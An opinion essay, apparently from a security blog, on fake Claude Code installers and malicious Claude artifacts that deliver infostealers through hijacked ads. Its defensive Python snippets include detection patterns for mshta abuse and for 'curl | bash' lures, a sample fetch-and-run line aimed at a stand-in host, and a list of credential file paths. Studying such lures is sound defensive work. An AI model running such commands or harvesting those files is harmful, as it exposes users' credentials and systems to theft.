# Fake Claude Code Malware: When Your AI Brand Becomes the Attack Surface
Every actor in this stack is pretending to be "smart" while doing the dumbest, most predictable thing imaginable, and developers are the collateral damage in a three-way grift between threat actors, ad platforms, and AI vendors who all swear this is the future of software. The fake Claude Code download campaign is the most on-the-nose example yet: compromised Google Ads accounts pushing pixel-perfect fake installers that install nothing except an mshta-driven infostealer, one that lives in memory, steals your browser credentials and tokens, and walks out the front door with your cloud sessions and Git repos.

There is a concept in offensive security called "Living off the Land" — the idea that you do not bring your own tools to the target; you use whatever is already there, already signed, already trusted. MITRE catalogs it as a technique category, but it has quietly become the default operating model of crimeware, the thing you assume rather than the thing you choose. This is that paradigm with better branding and worse incentives. As [CybersecurityNews reported](https://cybersecuritynews.com/threat-actors-using-fake-claude-code/), "cybercriminals have found a new way to target developers and IT professionals by setting up fake download pages that impersonate Claude Code." They're invoking mshta.exe — a signed Microsoft HTML Application host that's been abused for years — to pull a remote HTA, execute base64-wrapped script in memory, and never drop a clean binary for forensics to chew on. The same report explains the structural blind spot: "since it is a trusted, system-native tool, many security products do not flag its activity by default, making it a low-profile vehicle for attackers" ([CybersecurityNews](https://cybersecuritynews.com/threat-actors-using-fake-claude-code/)). Meanwhile, orgs still treat "we don't see new EXEs on disk" as a green light, and the [[20260306_svelto_bitflip_hardware_entropy_governance_sphere|Svelto bit-flip piece]] already showed us how deep the architectural assumptions go about what counts as "normal" system behavior.
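To make that blind spot concrete, here is a minimal detection sketch in Python, assuming process-creation telemetry with Sysmon-style `Image` and `CommandLine` fields (Event ID 1). The indicator patterns and sample events are illustrative, not a production rule:

```python
import re

# Indicators of mshta.exe abuse in a process command line. Illustrative
# patterns only; tune against your own telemetry before deploying.
SUSPICIOUS_MSHTA = [
    re.compile(r"https?://", re.IGNORECASE),                  # remote HTA pulled at launch
    re.compile(r"(vbscript|javascript)\s*:", re.IGNORECASE),  # inline script handed to the host
    re.compile(r"base64", re.IGNORECASE),                     # encoded payload in the command line
]

def flag_mshta(event: dict) -> bool:
    """True if this process-creation event looks like mshta.exe abuse."""
    image = event.get("Image", "").lower()
    if not image.endswith("\\mshta.exe"):
        return False
    cmdline = event.get("CommandLine", "")
    return any(p.search(cmdline) for p in SUSPICIOUS_MSHTA)

# Hardcoded sample events; in practice these come from your SIEM or an
# EVTX export. The domain is a made-up stand-in for the lure.
events = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://fake-claude-downloads.example/install.hta"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\tools\internal-dashboard.hta"},
]

for event in events:
    if flag_mshta(event):
        print("ALERT:", event["CommandLine"])
```

The shape of the logic is the point: you alert on a trusted binary's arguments, not on a new file landing on disk, because in this campaign no new file ever lands.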
The macOS side rhymes perfectly. Moonlock Lab and AdGuard walked everyone through attackers abusing Claude AI artifacts — hosted on Anthropic's own claude.ai infrastructure — plus Google Ads, to drive people into pasting a one-liner into Terminal that fetched a MacSync infostealer. "[The campaign] has already reached over 15,000 potential victims through two distinct attack variants that exploit users' trust in established online services" ([Cryptika](https://www.cryptika.com/threat-actors-exploit-claude-artifacts-and-google-ads-to-target-macos-users/)). Different OS, same pattern: leverage trusted AI branding, outsource distribution to Google's auction engine, rely on the mental shortcut that if it has the right logo and looks like a help page, it must be fine. As [News4Hackers detailed](https://www.news4hackers.com/clickfix-attack-exploits-claude-llm-artifacts-to-distribute-mac-infostealers/), "in both cases, the attackers use Google Ads to promote fake search results that lead to either a public Claude artifact or a Medium article impersonating Apple Support" — directly tying Google's ad ecosystem to the malware delivery chain.
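If you wanted a guardrail at the paste-into-Terminal step, it would look like a pattern check on the command before it ever runs. A rough sketch, with heuristics inferred from the reported fetch-and-run pattern rather than from the actual MacSync one-liner, which is not reproduced here:

```python
import re

# Heuristics for "paste this into Terminal" lures: a fetch piped straight
# into a shell, an encoded blob decoded and executed inline, or drop-and-run.
# Patterns are illustrative, not a complete blocklist.
PASTE_RED_FLAGS = {
    "fetch piped to shell":  re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|z)?sh\b"),
    "decode piped to shell": re.compile(r"base64\s+(-d|-D|--decode)[^|;]*\|\s*(ba|z)?sh\b"),
    "drop, chmod, run":      re.compile(r"chmod\s+\+x\b.*&&.*\./"),
}

def audit_paste(command: str) -> list[str]:
    """Return which red flags a command trips, before you run it."""
    return [name for name, p in PASTE_RED_FLAGS.items() if p.search(command)]

lure = "curl -fsSL https://fake-apple-support.example/fix.sh | bash"
print(audit_paste(lure) or "no obvious red flags (not the same thing as safe)")
```

None of this beats a determined lure, but it forces the "trusted logo, trusted page" mental shortcut through at least one explicit checkpoint.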
The hypocrisy stacks up when you put the marketing copy next to the TTPs. Anthropic and everyone else pitch "safer AI," "constitutional AI," "trustworthy systems," while their ecosystem is repeatedly weaponized as a delivery mechanism for commodity stealers on both platforms — fake Claude domains, fake Claude Code installers, malicious Claude artifacts, the works. Google runs "we care about your security" campaigns while compromised advertiser accounts push malicious Claude installers to the top of search results because the bidding algorithm doesn't care what the HTA does as long as the click-through rate is spicy. This is the same structural contradiction the [[20260306_mozilla_anthropic_firefox_red_team_ai_vulnerability_discovery|Mozilla/Anthropic Firefox red team piece]] circled: security research and security theater running on the same platform, sometimes in the same sprint.
It gets worse when you stack in the supply chain. Check Point disclosed RCE-grade bugs in Claude Code itself, where a repo-controlled config file could execute arbitrary commands on the machine of any developer who clones the repo and runs the tool inside it. As [TechRadar reported](https://www.techradar.com/pro/security/security-experts-flag-multiple-issues-in-claude-code-warning-as-ai-integration-deepens-se), "the ability to execute arbitrary commands through repository-controlled configuration files created severe supply chain risks, where a single malicious commit could compromise any developer working with the affected repository." That's not an edge case — one malicious commit turns your AI pair programmer into an unvetted remote shell. Stack that on top of fake installers and malicious artifacts and the "AI assistant" surface is practically indistinguishable from a moderately competent stealer campaign. The [[20260305_cursor_automations_always_on_agents_operational_risk|Cursor automations piece]] already flagged the operational risk of always-on agents with ambient filesystem access; this is that risk realized through the distribution layer.
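A cheap mitigation shape is a pre-flight audit before running any agent inside a fresh clone. The watchlist below is an assumption for illustration, since the disclosure does not enumerate the exact vulnerable files; these are simply config paths commonly capable of triggering command execution when tooling opens a repo:

```python
from pathlib import Path

# Config paths that can trigger command execution in a fresh clone.
# ASSUMED watchlist for illustration; the Check Point disclosure does
# not enumerate the exact vulnerable files.
EXECUTION_CAPABLE = [
    ".claude/settings.json",  # Claude Code project settings (hooks can run commands)
    ".mcp.json",              # project-scoped MCP server definitions
    ".vscode/tasks.json",     # editor tasks that may auto-run on folder open
]

def preflight(repo: Path) -> list[str]:
    """List execution-capable config files present in a cloned repo."""
    return [rel for rel in EXECUTION_CAPABLE if (repo / rel).exists()]

for rel in preflight(Path("./untrusted-clone")):
    print(f"review before running any agent here: {rel}")
```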
The path dependence is obvious once you lay it out. You build an ecosystem where developer onboarding is "just Google it and click the top thing," where ad placement outranks DNS literacy, where AI tools are marketed as must-have productivity upgrades, and where security teams are understaffed and told to "use AI for triage." In that environment, of course compromised Google Ads plus a cloned landing page plus mshta is enough to walk off with GitHub tokens, cloud sessions, and SSO cookies. Once those are gone, everything else follows: private repos scraped, secrets in code harvested, infrastructure-as-code mutated, internal dashboards accessed. The "infostealer" label understates it — for a dev, this is effectively a remote control for your whole operational graph. The [[20260306_udev_netlink_hotplug_earth_system_governance_miniature|udev hotplug governance piece]] showed how a properly designed system uses credential filtering at the socket layer; the developer ecosystem has nothing analogous for its own supply chain.
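To see why the label understates it, enumerate what sits on a typical dev box in well-known default locations. The paths below are the standard defaults for each tool, and the list is deliberately incomplete:

```python
from pathlib import Path

HOME = Path.home()

# Standard default locations for high-value developer credentials; this is
# roughly the shopping list a stealer works through. Not exhaustive.
CREDENTIAL_SURFACE = {
    "GitHub CLI token":    HOME / ".config/gh/hosts.yml",
    "AWS access keys":     HOME / ".aws/credentials",
    "kubeconfig":          HOME / ".kube/config",
    "npm publish token":   HOME / ".npmrc",
    "SSH private keys":    HOME / ".ssh",
    "gcloud credentials":  HOME / ".config/gcloud/credentials.db",
}

for name, path in CREDENTIAL_SURFACE.items():
    if path.exists():
        print(f"{name}: {path} (on disk, usable until revoked)")
```

Every hit is a credential that typically works from any IP until someone notices and revokes it, which is what turns one bad click into the whole operational graph.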
We end up in this absurd equilibrium where devs are told "you must use AI tools to keep up," the distribution of those tools is mediated by an ad ecosystem that can be quietly hijacked, the tools themselves occasionally ship RCE-class flaws, and the same brand can appear as secure copilot, attack surface, and lure in three different reports in the same month. Everyone involved — ad platforms, AI vendors, security tool makers — gets to shrug and talk about "the evolving threat landscape" instead of admitting that this is exactly what you get when you wire critical workflows to systems whose primary optimization target is engagement, not integrity. The [[20260306_menlo_mit_37b_boom_95pct_failure_arms_race_bubble|Menlo/MIT capex piece]] applies here: the more capital you pour into making these tools ubiquitous, the more valuable every exploit path into the ecosystem becomes. The interesting question isn't "how do we tell devs to click the right link" — it's what an AI-centric development environment looks like if you design it assuming the ad layer, the artifact layer, and the OS layer are all actively hostile some of the time.
*Your AI brand is simultaneously your growth engine, your attack surface, and someone else's lure. That is not a bug in the ecosystem — it is the ecosystem working exactly as designed, just not for you. The honest follow-up to the question above is that the entire development environment is already wired to distribution channels that are adversarial some fraction of the time, and nobody can tell you which fraction.*